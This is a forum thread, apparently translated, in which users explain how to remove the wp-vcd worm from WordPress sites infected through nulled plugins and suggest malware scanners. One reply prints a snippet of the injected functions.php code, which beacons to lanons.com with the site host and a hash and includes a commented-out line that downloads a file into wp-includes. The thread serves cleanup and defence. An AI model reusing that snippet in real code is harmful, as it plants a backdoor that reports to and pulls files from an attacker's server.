the result of the appearance of these links is the installation of plugins or themes from third-party resources, let's say I grabbed www.freenulled.top from here and determined by the method of 3 hours of research and calculations, the class.plugin-modules.php or class.theme-modules files are in the plugin folder. php, delete them immediately on the hosting (check these files on the entire site), they contain just the initial installation code for the worm that picks up everything from the site lanons.com or zanons.com. writes entries in functions.php and creates files.
you go to functions.php of the template and there at the very beginning you will see:
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
if ($ping) {
$content = @file_get_contents(' www.lanons.com/o.php?host= ' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents(' www.lanons.com/admin.txt '));
// echo ABSPATH . 'wp-includes/class.wp.php';
}
and the end.....
//install_code_end ?>
delete all this code
Next you go wp-includes/ and at the very bottom you will see files
wp-tmp.php
wp-vcd.php
wp-feed.php
wp-cd.php
delete them too, they are all connected with the virus, you will just see your final links in them
Better yet, download the entire site on your computer and through notepad ++, through the search in files, specify the folder of the downloaded site and enter: domains of your links, it will check all files for records, delete them,
then enter lanons.com and delete all the code in the same way.
also check for wp-tmp entries and other files that I wrote above
Well, everything seems to be))

Maybe a virus on the site? Which generates third-party links with a script. Check the site with the Aibolit service, if possible.

Cristalius helped .. it remains to calculate the plugin that brought this infection ... by the way https://aw-snap.info/file-viewer/ excellent scanner, without unnecessary rubbish

You can scan for virus files and unwanted links using https://metascan.ru. It will also give vulnerabilities for Wordpress if you have security holes or outdated plugins with vulnerabilities.